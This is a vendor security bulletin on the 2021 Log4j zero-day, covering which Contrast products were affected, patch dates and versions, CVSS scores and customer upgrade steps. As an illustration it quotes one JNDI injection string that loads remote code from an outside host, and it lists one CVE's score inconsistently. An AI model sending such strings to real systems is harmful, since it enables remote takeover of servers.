Support Bulletin: Log4J Zero-Day Impact on Contrast Applications

  • Updated

Originally posted: Dec 10th, 2021 (All times Eastern/ U.S.)

This page is updated frequently. Please see date/time (GMT) in the by line for most current article update.

We have been closely following the log4j issues over the past few weeks. Regarding CVE-2021-44832, this specific vulnerability utilizes a non-standard log4j configuration which we do not use. So, it would require a malicious actor to have access to modify the log4j configuration file which would require elevated privileges to do so. The risk of this is extremely low, and therefore the initial Apache software foundation CVSS score is rating this a 6.6. Our standard vulnerability management process follows a 30 day fix window for vulnerabilities of this rating. More information can be found here: CVSS Score

What happened?  What and who specifically does this impact?

A zero day vulnerability for the ubiquitous library Log4J was published at ~9:30 a.m. US Eastern on 2021-12-09 and is now published as CVE-2021-44228.

All customers of Contrast were impacted. The vulnerable library was confirmed to be used in the Contrast application; both SaaS and On-Premises (“EOP”) deployments. No evidence of any penetration has been identified by Contrast at this time.

  • 12/9/2021 at 22:15 EST, Contrast had already patched the SaaS application to log4j2.15. 
  • 12/14/2021 at 15:37 EST, Contrast has patched all SaaS applications to log4j2.16.
  • 12/18/2021 at 11:36 EST, Contrast has patched all SaaS applications to log4j2.17.
  • 12/18/2021 at 12:18 EST, Contrast has released a patched EOP with log4j2.17

With the upgrade to log4j 2.17 this covers:

CVE-2021-44228

CVE-2021-45046

CVE-2021-45105

For On-Premises customers, Contrast has released a patched version with log4j2.17 that all customers are recommended to upgrade

Of note: While Contrast software is impacted and we are notifying all customers, it is extremely likely that your company’s Java application portfolio is also impacted. Please take measures to upgrade/update your portfolio immediately. Protect guards most applications for most vectors including published POCs, and we’re working to close gaps we’ve identified internally

What is the vulnerability / incident?

CVE-2021-44228 - More information from the National Vulnerability Database can be found (here).

Additional references can be found on social media platforms like Twitter (here). 

Why is it bad?

The library in question is highly distributed across Java applications. Contrast believes this CVE will have an extremely broad impact in the community impacting the majority of Java applications.

Contrast has confirmed this library was in use across several Contrast products (detail below). 

How likely is it? 

Any application that uses Log4j to log any information controlled by the attacker is vulnerable, including any HTTP headers, URIs, parameters, or cookies.  Exploitation is exceptionally simple and can be easily automated.  For example, sending “${jndi:rmi://192.168.1.31:1099/9tmpja}” in a single HTTP request is enough to take full control of the application host. The risk is especially high if your system is accessible via the world wide web as we are detecting widespread automated attacks against our customers. Contrast Labs has confirmed that it is exploitable.

Our evaluation efforts will continue and we will keep you apprised of our progress.

How severe is it? 

While these CVEs are still under scrutiny by the National Institute of Standards and Technology (NIST) at this time, they have set initial CVSS scores. However, the Apache Software foundation continues to update the scores. Contrast experts agree with the ASF scoring and have updated our CVE scoring to reflect these updates.

CVE-2021-44228 - CVSS 10.0

  • More information from the National Vulnerability Database can be found (here)
  • Apache Software Foundation rates this as a 10.0 CVSS (here)
  • Fixed in version 2.15

CVE-2021-45046 - CVSS 9.0

  • More information from the National Vulnerability Database can be found (here)
  • Apache Software Foundation rates this as a 9.0 CVSS (here)
  • Fixed in version 2.16

CVE-2021-45105 - CVSS 7.5

  • More information from the National Vulnerability Database can be found (here)
  • Apache Software Foundation rates this as a 9.0 CVSS (here)
  • Fixed in version 2.17

How is this relevant for Contrast Security and which customers might be impacted?   

Contrast hosted (SaaS) customers would have been impacted had this been exploited. Our teams have patched all hosted (SaaS) systems, and no evidence of penetration has been detected. 

Contrast EOP customers whose systems are accessible via the web should patch their system immediately.  A patched version of EOP has been released and all customers are recommended to upgrade ASAP.

Contrast Java agent is not impacted.  In order for Contrast Security products to support applications that use legacy technologies and frameworks like Java 6, Java 7 and JBoss, our Java agent is using an older version of log4j.  Our team audits our dependencies for security risk and we have found our usage of log4j 1.x to be an acceptable risk. However, we are looking into releasing a newer version of the Java agent that does not depend on the log4j 1.x, but may not support legacy frameworks mentioned above.

Product

Impacted

Protected

Patched

Hosted (SaaS) Environments (all)

Yes

Yes

Contrast Protect in place.

Yes

  • 22:15 EST 12/9/21: Patched in version 20211210-0244.7cb22d5f24
  • 12/14/21: Latest patched version brings log4j to v2.16 20211214-1919.f9997ec34b
  • 12/18/21: Latest patched version brings log4j to v2.17 20211218-1347.94611350e8
  • 01/04/22: Latest patched version brings log4j to 2.17.1 20220105-0044.b896b7f413 

On-premises (EOP) Environments

Yes

No

Yes

  • 12/10/21: Upgraded Log4j to 2.15 in version 3.8.10.1566200307
  • 12/16/21: Upgraded Log4j to 2.16 in version 3.8.10.1589286247
  • 12/18/21: Upgraded Log4j to v2.17 in version 3.8.10.1596449597
  • 01/11/22: Upgraded Log4j to v2.17.1 in version 3.8.11.1683721903

Java Agent

No

N/A

N/A

Scan

Yes

Yes

Contrast Protect in place.

Yes

  • 15:35 EST 12/10/21: Patched in version 0.0.124
  • 12/15/21: Scan Microservice updated to Logback 1.2.8
  • 12/15/21: Scan Engine updated to log4j 2.16
  • 12/19/21: Scan Engine updated to log4j 2.17
  • 01/05/22: Scan Engine updated to log4j 2.17.1 

 

How does a Contrast customer determine if and where they’re vulnerable?  

All versions of Contrast EOP Teamserver are vulnerable to this zero-day prior to 3.8.10.1566200307.  Additionally, per ASF recommendations. We have released 3.8.10.1589286247 which adds further protection against CVE-2021-45046 by updating to log4j2.16. An additional release 3.8.10.1596449597 adds protection against CVE-2021-45105 by updating to log4j2.17.

 

What should a Contrast customer do, if anything?

On-Premises customers are recommended to upgrade to the latest patched version (3.8.10.1596449597 or higher) available on Hub (here). Standard upgrade instructions (here) can be followed.

For customers’ portfolio of Java applications, Customers will need to search for the vulnerable library in their apps and update with the patched library as soon as possible. Contrast Labs has also confirmed that Contrast Assess will flag this vulnerability as “Log Injection” in vulnerable code paths. Contrast SCA will also identify this vulnerable library. Contrast has published a blog with recommended fixes to all vulnerable Java applications here: https://www.contrastsecurity.com/security-influencers/0-day-detection-of-log4j2-vulnerability

 

If you have any questions, concerns, or would like to discuss this issue further, please don’t hesitate to reach out to us via the link below or at support@contrastsecurity.com.

 

Related Articles:

Was this article helpful?

0 out of 0 found this helpful

Have more questions? Submit a request